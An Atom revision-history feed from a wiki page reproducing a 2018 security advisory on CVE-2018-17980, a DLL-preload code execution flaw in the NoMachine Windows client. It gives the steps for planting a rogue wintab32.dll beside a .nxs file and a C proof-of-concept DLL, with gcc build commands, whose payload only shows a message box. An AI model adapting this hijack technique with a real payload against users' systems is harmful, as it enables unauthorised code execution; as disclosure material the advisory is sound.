<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-17980_NoMachine_5.3.26_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2018-17980 NoMachine 5.3.26 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2018-17980_NoMachine_5.3.26_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-17980_NoMachine_5.3.26_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T06:14:15Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-17980_NoMachine_5.3.26_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1509&amp;oldid=prev</id>
		<title>Pwnwiki at 01:23, 11 April 2021</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-17980_NoMachine_5.3.26_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1509&amp;oldid=prev"/>
		<updated>2021-04-11T01:23:30Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;chinese&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 01:23, 11 April 2021&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Line 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==INFO==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==INFO==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&amp;lt;pre&amp;gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;[+] Credits: John Page (aka hyp3rlinx)		&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;[+] Credits: John Page (aka hyp3rlinx)		&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;[+] Website: hyp3rlinx.altervista.org&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;[+] Website: hyp3rlinx.altervista.org&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l111&quot; &gt;Line 111:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 112:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;hyp3rlinx&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;hyp3rlinx&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&amp;lt;/pre&amp;gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key pwn_wiki:diff::1.12:old-1508:rev-1509 --&gt;
&lt;/table&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2018-17980_NoMachine_5.3.26_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1508&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== [+] Credits: John Page (aka hyp3rlinx)		 [+] Website: hyp3rlinx.altervista.org [+] Source:  http://hyp3rlinx.altervista.org/advisories/NOMACHINE-TROJAN-FILE-REMOTE-CO...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2018-17980_NoMachine_5.3.26_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1508&amp;oldid=prev"/>
		<updated>2021-04-11T01:23:08Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== [+] Credits: John Page (aka hyp3rlinx)		 [+] Website: hyp3rlinx.altervista.org [+] Source:  http://hyp3rlinx.altervista.org/advisories/NOMACHINE-TROJAN-FILE-REMOTE-CO...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
[+] Credits: John Page (aka hyp3rlinx)		&lt;br /&gt;
[+] Website: hyp3rlinx.altervista.org&lt;br /&gt;
[+] Source:  http://hyp3rlinx.altervista.org/advisories/NOMACHINE-TROJAN-FILE-REMOTE-CODE-EXECUTION.txt&lt;br /&gt;
[+] ISR: ApparitionSec          &lt;br /&gt;
 &lt;br /&gt;
Greetz: ***Greetz: indoushka | Eduardo ***&lt;br /&gt;
&lt;br /&gt;
[Vendor]&lt;br /&gt;
www.nomachine.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Product]&lt;br /&gt;
NoMachine  &amp;lt;= v5.3.26&lt;br /&gt;
&lt;br /&gt;
NX technology, developed by NoMachine, and commonly known as &amp;quot;NX&amp;quot; is a proprietary computer program that provides desktop and remote access.&lt;br /&gt;
It consists of a suite of products for desktop virtualization and application delivery for servers, and client software.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Vulnerability Type]&lt;br /&gt;
Trojan File Remote Code Execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Affected Component]&lt;br /&gt;
wintab32.dll&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[CVE Reference]&lt;br /&gt;
CVE-2018-17980&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Security Issue]&lt;br /&gt;
Possible arbitrary code execution when opening a &amp;quot;.nxs&amp;quot; nomachine file type on client's wintab32.dll preload.&lt;br /&gt;
This issue regards the client part of all NoMachine installations on Windows (NoMachine free, NoMachine Enterprise Client, NoMachine Enteprise Desktop and NoMachine Cloud Server).&lt;br /&gt;
&lt;br /&gt;
1) create a 32 bit DLL named &amp;quot;wintab32.dll&amp;quot;&lt;br /&gt;
2) create an native nomachine &amp;quot;.NXS&amp;quot; file and open it alongside the trojan &amp;quot;wintab32.dll&amp;quot; DLL from Network share or any dir.&lt;br /&gt;
BOOM!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[References]&lt;br /&gt;
https://www.nomachine.com/TR10P08887&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Exploit/POC]&lt;br /&gt;
&lt;br /&gt;
#include &amp;lt;windows.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
/* hyp3rlinx */&lt;br /&gt;
&lt;br /&gt;
/*&lt;br /&gt;
gcc -c -m32 wintab32.c&lt;br /&gt;
gcc -shared -m32 -o wintab32.dll wintab32.o&lt;br /&gt;
*/&lt;br /&gt;
&lt;br /&gt;
void executo(){&lt;br /&gt;
 MessageBox( 0, &amp;quot;3c184981367094fce3ab70efc3b44583&amp;quot; , &amp;quot;:)&amp;quot; , MB_YESNO + MB_ICONQUESTION );&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){&lt;br /&gt;
 switch(fdwReason){&lt;br /&gt;
  case DLL_PROCESS_ATTACH:{&lt;br /&gt;
	executo();&lt;br /&gt;
	break;&lt;br /&gt;
	}&lt;br /&gt;
  case DLL_PROCESS_DETACH:{&lt;br /&gt;
	executo();&lt;br /&gt;
	break;&lt;br /&gt;
	}&lt;br /&gt;
  case DLL_THREAD_ATTACH:{&lt;br /&gt;
	executo();&lt;br /&gt;
	break;&lt;br /&gt;
       }&lt;br /&gt;
  case DLL_THREAD_DETACH:{&lt;br /&gt;
	executo();&lt;br /&gt;
	break;&lt;br /&gt;
	}&lt;br /&gt;
   }&lt;br /&gt;
	return TRUE;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Network Access]&lt;br /&gt;
Remote&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Severity]&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Disclosure Timeline]&lt;br /&gt;
Vendor Notification: September 26, 2018&lt;br /&gt;
Vendor verified vulnerability: September 28, 2018&lt;br /&gt;
CVE assigned by Mitre: October 4, 2018&lt;br /&gt;
Vendor release fixed version: October 11, 2018&lt;br /&gt;
October 11, 2018 : Public Disclosure&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[+] Disclaimer&lt;br /&gt;
The information contained within this advisory is supplied &amp;quot;as-is&amp;quot; with no warranties or guarantees of fitness of use or otherwise.&lt;br /&gt;
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and&lt;br /&gt;
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit&lt;br /&gt;
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility&lt;br /&gt;
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information&lt;br /&gt;
or exploits by the author or elsewhere. All content (c).&lt;br /&gt;
&lt;br /&gt;
hyp3rlinx&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>